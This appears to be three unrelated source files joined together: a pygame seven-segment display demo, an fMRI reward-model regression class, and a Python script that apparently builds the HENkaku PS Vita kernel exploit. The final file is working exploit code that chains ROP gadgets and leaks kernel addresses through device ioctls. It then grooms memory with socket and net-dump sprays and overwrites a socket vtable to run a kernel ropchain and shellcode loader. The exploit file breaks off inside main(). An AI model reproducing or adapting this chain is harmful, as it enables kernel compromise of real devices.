bar_img_deactive_horizontal = pygame.image.load('bar2.png')
bar_img_deactive_vertical = pygame.transform.rotate(bar_img_deactive_horizontal,90)
#for display
pygame.init()
screen=pygame.display.set_mode((width,height))
pygame.display.set_caption("Display")
clock=pygame.time.Clock()
class Bar(pygame.sprite.Sprite):
def __init__(self, x,y,active,orientation='horizontal'):
pygame.sprite.Sprite.__init__(self)
self.x = x
self.y = y
self.active = active
self.image = bar_img_deactive_horizontal
self.image.set_colorkey(black)
self.rect = self.image.get_rect()
self.rect.center = (self.x, self.y)
self.old_active = False
self.orientation = orientation
def update(self):
if self.old_active != self.active:
self.old_active = self.active
if self.orientation == "vertical":
if self.active: self.image = bar_img_active_vertical
else: self.image = bar_img_deactive_vertical
else:
if self.active: self.image = bar_img_active_horizontal
else: self.image = bar_img_deactive_horizontal
#sprite groups
all_sprite = pygame.sprite.Group()
bar = Bar(width//2, 30, True, "horizontal")
bar1 = Bar(width//2,height//2, True, "horizontal")
bar2 = Bar(width//2, height - 30, True, "horizontal")
bar3 = Bar(160, 60, True, "vertical")
bar4 = Bar(370, 60, True, "vertical")
bar5 = Bar(160, 290,True,'vertical')
bar6 = Bar(370,290, True,'vertical')
bars = [bar,bar1,bar2,bar3,bar4,bar5,bar6]
all_sprite.add(bars)
#NUMBERS
NUMBERS = [
[1, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 0, 1],
[1, 1, 1, 0, 1, 1, 0],
[1, 1, 1, 0, 1, 0, 1],
[0, 1, 0, 1, 1, 0, 1],
[1, 1, 1, 1, 0, 0, 1] ,
[1, 1, 1, 1, 0, 1, 1],
[1, 0, 0, 0, 1, 0, 1],
[1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0, 1]
]
#game loop
current_no = 0
run=True
last_time_changed = pygame.time.get_ticks()
while run:
#clock spped
clock.tick(fps)
#input(events)
for event in pygame.event.get():
if event.type==pygame.QUIT:
run=False
#update
if pygame.time.get_ticks() - last_time_changed >= 1000:
last_time_changed = pygame.time.get_ticks()
if current_no == 9 : current_no = 0
else : current_no += 1
i = 0
for b in bars:
b.active = NUMBERS[current_no][i]
i += 1
all_sprite.update()
#Draw/render
screen.fill(black)
all_sprite.draw(screen)
pygame.display.flip()
pygame.quit()
exit() |
<reponame>parenthetical-e/fmri
""" Another (sub)set of models, this one contains only those with literature
driven RL (or related) terms. Prior analyses were more exploratory.
In this set we allow for seperate regressors matching behavoiral accuracy,
as well as inverted and positive-value-only coding schemes. """
from roi.base import Mean
class Rewardrecode(Mean):
""" A Roi analysis class, customized for the catreward project.
Unlike Catreward, this reads in the average bold data from a
text file. """
def __init__(self, TR, roi_name, trials, durations, data):
Mean.__init__(self, TR, roi_name, trials, durations, data)
self.data['meta']['bold'] = self.roi_name
self.create_bold(preprocess=True)
self.create_hrf(function_name='double_gamma')
# --
# Accuracy
def model_0101(self):
""" Behavioral accuracy. """
data_to_use = ['acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0102(self):
""" Behavioral accuracy, diminished by (exponential) similarity. """
data_to_use = ['acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0103(self):
""" Behavioral accuracy, diminished by (gaussian) similarity. """
data_to_use = ['acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Gains and losses
def model_0201(self):
""" Gains and losses. """
data_to_use = ['gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0202(self):
""" Gains and losses, diminished by (exponential) similarity. """
data_to_use = ['gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0203(self):
""" Gains and losses, diminished by (gaussian) similarity. """
data_to_use = ['gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors
def model_0301(self):
""" Gains and losses, in 2 regressors. """
data_to_use = ['gl_1', 'gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0302(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. """
data_to_use = ['gl_exp_1', 'gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0303(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. """
data_to_use = ['gl_gauss_1', 'gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
# RPE
def model_0401(self):
""" RPE - derived from accuracy. """
data_to_use = ['rpe_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0402(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['rpe_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0403(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['rpe_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_0501(self):
""" Value - derived from accuracy. """
data_to_use = ['value_acc']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0502(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. """
data_to_use = ['value_acc_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0503(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. """
data_to_use = ['value_acc_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_0701(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0702(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0703(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_0801(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0802(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0803(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_0901(self):
""" RPE - derived from gains and loses. """
data_to_use = ['rpe_gl_1', 'rpe_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0902(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['rpe_gl_exp_1', 'rpe_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_0903(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['rpe_gl_gauss_1', 'rpe_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1001(self):
""" Value - derived from gains and losses. """
data_to_use = ['value_gl_1', 'value_gl_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1002(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. """
data_to_use = ['value_gl_exp_1', 'value_gl_exp_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1003(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. """
data_to_use = ['value_gl_gauss_1', 'value_gl_gauss_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# INVERTED VALUES
# --
# Gains and losses INVERTED
def model_1101(self):
""" Gains and losses. Reward coding inversed. """
data_to_use = ['gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1102(self):
""" Gains and losses, diminished by (exponential) similarity.
Reward coding inversed. """
data_to_use = ['gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1103(self):
""" Gains and losses, diminished by (gaussian) similarity.
Reward coding inversed. """
data_to_use = ['gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors INVERTED
def model_1201(self):
""" Gains and losses, in 2 regressors.
Reward coding inversed. """
data_to_use = ['gl_invert_1', 'gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1202(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_exp_invert_1', 'gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1203(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_gauss_invert_1', 'gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding INVERTED
# RPE
def model_1301(self):
""" RPE - derived from accuracy. Reward coding inversed."""
data_to_use = ['rpe_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1302(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1303(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_1401(self):
""" Value - derived from accuracy. Reward coding inversed."""
data_to_use = ['value_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1402(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1403(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_1601(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1602(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1603(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_1701(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1702(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1703(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_1801(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert_1', 'rpe_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1802(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert_1', 'rpe_gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1803(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert_1', 'rpe_gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1901(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert_1', 'value_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1902(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_exp_invert_1', 'value_gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1903(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_gauss_invert_1', 'value_gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# POSTIVE CODING
# --
# Gains and losses INVERTED
def model_2001(self):
""" Gains and losses. Reward coding was positive only. """
data_to_use = ['gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2002(self):
""" Gains and losses, diminished by (exponential) similarity.
Reward coding was positive only. """
data_to_use = ['gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2003(self):
""" Gains and losses, diminished by (gaussian) similarity.
Reward coding was positive only. """
data_to_use = ['gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors pos only
def model_2101(self):
""" Gains and losses, in 2 regressors.
Reward coding was positive only. """
data_to_use = ['gl_pos_1', 'gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2102(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. Reward coding was positive only. """
data_to_use = ['gl_exp_pos_1', 'gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2103(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. Reward coding was positive only. """
data_to_use = ['gl_gauss_pos_1', 'gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_2501(self):
""" RPE - derived from gains and loses.
Reward coding was positive only. """
data_to_use = ['rpe_gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2502(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2503(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_2601(self):
""" Value - derived from gains and losses.
Reward coding was positive only. """
data_to_use = ['value_gl_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2602(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_exp_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2603(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_gauss_pos']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_2701(self):
""" RPE - derived from gains and loses.
Reward coding was positive only. """
data_to_use = ['rpe_gl_pos_1', 'rpe_gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2702(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_exp_pos_1', 'rpe_gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2703(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['rpe_gl_gauss_pos_1', 'rpe_gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_2801(self):
""" Value - derived from gains and losses.
Reward coding was positive only. """
data_to_use = ['value_gl_pos_1', 'value_gl_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2802(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_exp_pos_1', 'value_gl_exp_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_2803(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding was positive only. """
data_to_use = ['value_gl_gauss_pos_1', 'value_gl_gauss_pos_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# CONTROL MODELS
def model_29(self):
""" Outcome similarity (exponential). """
data_to_use = ['exp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_30(self):
""" Outcome similarity (gaussian). """
data_to_use = ['gauss']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_31(self):
""" Behavoiral/category responses as separate regressors. """
data_to_use = ['resp1', 'resp6']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_32(self):
""" Outcome and contra-outcome similarities (exponential),
as separate regressors. """
data_to_use = ['exp', 'exp_opp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_33(self):
""" Outcome and contra-outcome similarities (gaussian),
as separate regressors. """
data_to_use = ['gauss', 'gauss_opp']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_34(self):
""" Gabor angle parameter. """
data_to_use = ['angle']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_35(self):
""" Gabor width parameter. """
data_to_use = ['width']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
|
<filename>urop/exploit.py
#!/usr/bin/env python3
from os import sys, path
sys.path.append(path.join(path.dirname(path.dirname(path.abspath(__file__))), "build"))
from target_360 import Rop360, G, F
from util import p32, p8
from rop import Ret, Load
from krop import krop
from sys import argv, exit
thread_attr = 0x10000100
stack_size = 0x2000
need_sockets = 80
user_ropchain_len = 0x100
ldm_buf_size = 7 * 4
need_dumps = 11
stack_shellcode_offset = 0x300
sysmem_shellcode_offset = 0x27640
stack_rop_offset = 4
kstack_offset_to_data = 1784
normal_args = (2, 1, 0)
special_args = (17, 3, 0)
class RopThread:
def __init__(self, rop):
self.microrop = []
self.rop = rop
def create(self):
r = self.rop
c = r.caller
d = r.data
self.thread_id = r.pre_alloc_var(4)
self.thread_info = r.pre_alloc_var(0x80)
self.stack_base = r.pre_alloc_var(4)
self.user_ropchain = r.pre_alloc_var(user_ropchain_len)
self.ldm_buf = r.pre_alloc_var(ldm_buf_size)
c.sceKernelCreateThread(d.empty_str, G.ldm_r1_stuff, thread_attr, stack_size, 0, 0, 0)
c.store(Ret, self.thread_id)
c.store(0x7C, self.thread_info)
c.sceKernelGetThreadInfo(Load(self.thread_id), self.thread_info)
# some free space for function calls
c.add(Load(self.thread_info + 0x34), 0x1000)
c.store(Ret, self.stack_base)
def call(self, func, a1=0, a2=0, a3=0, a4=0, last_r4=0):
self.microrop += [
G.pop_r0_to_r5,
a1,
a2,
a3,
a4,
func,
0,
G.blx_r4_pop_r4,
last_r4,
]
def infloop(self):
self.microrop.append(G.infloop)
def go(self):
r = self.rop
c = r.caller
addr = self.user_ropchain
for word in self.microrop:
c.store(word, addr)
addr += 4
# copy user ropchain into user stack
c.memcpy(Load(self.stack_base), self.user_ropchain, user_ropchain_len)
# set up args for LDM user thread stack pivot
c.store(Load(self.stack_base), self.ldm_buf+5*4)
c.store(G.pop_pc, self.ldm_buf+6*4)
c.sceKernelStartThread(Load(self.thread_id), ldm_buf_size, self.ldm_buf)
def create_dumps(rop, start, end, step, use_repeat=False):
"""
Tries to create dumps in range [start; end], every step bytes
end < start
generally, only 1 dump should be created
this is used to claim empty space
"""
r = rop
c = rop.caller
d = rop.data
if use_repeat:
# Size of dump to allocate
size = r.pre_alloc_var(p32(start))
# How many iterations we need to perform
iters = (start - end) // step
r.repeat(iters, [
# r1 = [size]
G.pop_r1_pc,
size,
G.pop_r5_r6_r7_r8_sb_pc,
0,
0,
0,
0,
G.pop_pc,
G.ldr_r1_r1_blx_sb,
# r0 = empty_str
G.pop_r0_pc,
d.empty_str,
# r2 = 0
G.pop_r2_pc,
0,
# call the function
G.pop_r4_pc,
F.sceNetDumpCreate_svc,
G.blx_r4_pop_r4_pc,
0,
# r0 = [size]
G.pop_r0_pc,
size,
G.ldr_r0_r0_pop_r4_pc,
0,
# r0 -= step
G.pop_r1_pc,
(-step) & 0xFFFFFFFF,
G.pop_r4_pc,
G.adds_r0_r1,
G.blx_r4_pop_r4_pc,
0,
# [size] = r0
G.pop_r1_pc,
size,
G.str_r0_r1_pop_r4,
0,
])
else:
for dump_sz in range(start, end-1, -step):
c.sceNetDumpCreate_svc(d.empty_str, dump_sz, 0)
def make_rop(kx_loader, second_payload):
r = Rop360()
r.assume_null_init = True
c = r.caller
d = r.data
r.pre_alloc_data(
ioctl=0x400,
sysmem_base=4,
rop_thread_id=4,
sockets=need_sockets*4,
args_buf_first=0x10,
args_buf_second=0x10,
open_device_name="molecule0:",
device_name="sdstor0:",
command="gcd-lp-ign-gamero",
our_data=0x1000,
tester=4,
pret=4,
empty_str="",
dumps_to_delete=need_dumps*4,
dump_to_free=4,
mybuf=0x100,
krop=0x400,
kx_loader_addr=4,
kx_loader=kx_loader,
second_payload = second_payload,
kernel_stack_base=4,
)
c.sceIoOpen(d.open_device_name, 0, 0)
# only leak sysmem from this call
c.sceIoDevctl(d.device_name, 5, d.command, 0x14, d.ioctl, 0x3FF)
c.add(Load(d.ioctl+0x3D4), -0x5747)
c.store(Ret, d.sysmem_base)
# -----8<-----------------------------------------------------------------------
plant = RopThread(r)
plant.create()
c.store(0x14, d.args_buf_first+0)
c.store(d.ioctl, d.args_buf_first+4)
c.store(0x3FF, d.args_buf_first+8)
c.store(0x400, d.args_buf_second+0)
c.store(0, d.args_buf_second+4)
c.store(0, d.args_buf_second+8)
# sceIoOpen to populate kernel stack
plant.call(F.sceIoOpen, d.open_device_name)
# first devctl to leak stack/sysmem addr
plant.call(F.sceIoDevctl_svc, d.device_name, 5, d.command, d.args_buf_first)
# delay to sync our two threads
plant.call(F.sceKernelDelayThread, 200 * 1000)
# second devctl to plant our data into kmem
plant.call(F.sceIoDevctl_svc, d.device_name, 5, d.our_data, d.args_buf_second)
plant.infloop()
plant.go()
# ----->8-----------------------------------------------------------------------
# sleep 0.1s
c.sceKernelDelayThread(100 * 1000)
c.add(Load(d.ioctl+0x3C4), -0xABC)
c.store(Ret, d.kernel_stack_base)
# set up data for kernel
c.add(Load(d.sysmem_base), 0x1e460) # ldm R0, {R4,R10,R12,SP,PC}
c.store(Ret, d.our_data) # future function ptr
# layout: [ ldm_gadget ] [ kernel ropchain .... ] ... [ payload? ]
# remember: we only have 0x400 bytes, and the less we use the better
c.add(Load(d.kernel_stack_base), kstack_offset_to_data)
c.add(Ret, stack_shellcode_offset)
c.store(Ret, d.kx_loader_addr)
krop(r)
c.memcpy(d.our_data + stack_rop_offset, d.krop, 0x300)
# set up shellcode
c.memcpy(d.our_data + stack_shellcode_offset, d.kx_loader, 0x400)
# after the plant thread wakes up, it should copy our_data into kernel stack
# set up overwritten socket structure
c.add(Load(d.kernel_stack_base), 1756)
c.store(Ret, d.mybuf + 6 * 4) # vptr
c.add(Load(d.kernel_stack_base), kstack_offset_to_data)
c.add(Ret, stack_rop_offset)
c.store(Ret, d.mybuf + 3 * 4) # sp
c.add(Load(d.sysmem_base), 0x347) # pop {pc} to kick off the ropchain
c.store(Ret, d.mybuf + 4 * 4)
# create and set up rop thread that will call vulnerable syscall
vuln = RopThread(r)
vuln.create()
# create a lot of sockets
for x in range(need_sockets):
c.socket(d.empty_str, *normal_args)
c.store(Ret, d.sockets + 4 * x)
c.socket(d.empty_str, *normal_args)
c.socket(d.empty_str, *special_args)
c.store(Ret, d.tester)
c.socket(d.empty_str, *normal_args)
vuln.call(F.sceNetSyscallIoctl, Load(d.tester), 0x10007300, 0, 0, d.pret)
vuln.microrop += [
G.str_r0_r4_pop_r4,
0,
]
vuln.infloop()
for x in range(need_dumps):
c.sceNetDumpCreate_svc(d.empty_str, 0xF00, 0)
c.store(Ret, d.dumps_to_delete + 4 * x)
c.sceNetDumpCreate_svc(d.empty_str, 0x2000, 0)
c.store(Ret, d.dump_to_free)
# free some memory and create holes
for x in range(0, need_dumps, 2):
c.sceNetDumpDestroy(Load(d.dumps_to_delete + 4 * x))
create_dumps(r, 0x100000, 0xF40, 0x10, use_repeat=True)
# it should hang
vuln.go()
c.sceKernelDelayThread(100 * 1000)
# free sockets
for x in range(0, need_sockets, 2):
c.sceNetSyscallClose(Load(d.sockets + 4 * x))
c.sceNetSyscallClose(Load(d.tester))
for x in range(0x20):
c.sceNetSyscallControl(0, 0x30000000, d.mybuf, 0xFC)
c.sceNetDumpDestroy(Load(d.dump_to_free))
c.sceKernelDelayThread(100 * 1000)
# on success this will remain at 0, on error it will be -22
c.add(Load(d.pret), G.bx_lr)
# we continue user rop when kernel payload triggers and crash webkit otherwise
# so it has a chance to try again
r.call_r0()
# free the dumps now, we need net memory for http stuff in usermode to work!
for dump_id in range(0x1770, 0x1791):
c.sceNetDumpDestroy(dump_id)
r.infloop()
r.compile()
return r
def main():
if len(argv) != 4:
print("Usage: exploit.py kx-loader second-payload output-henkaku-bin")
return 1
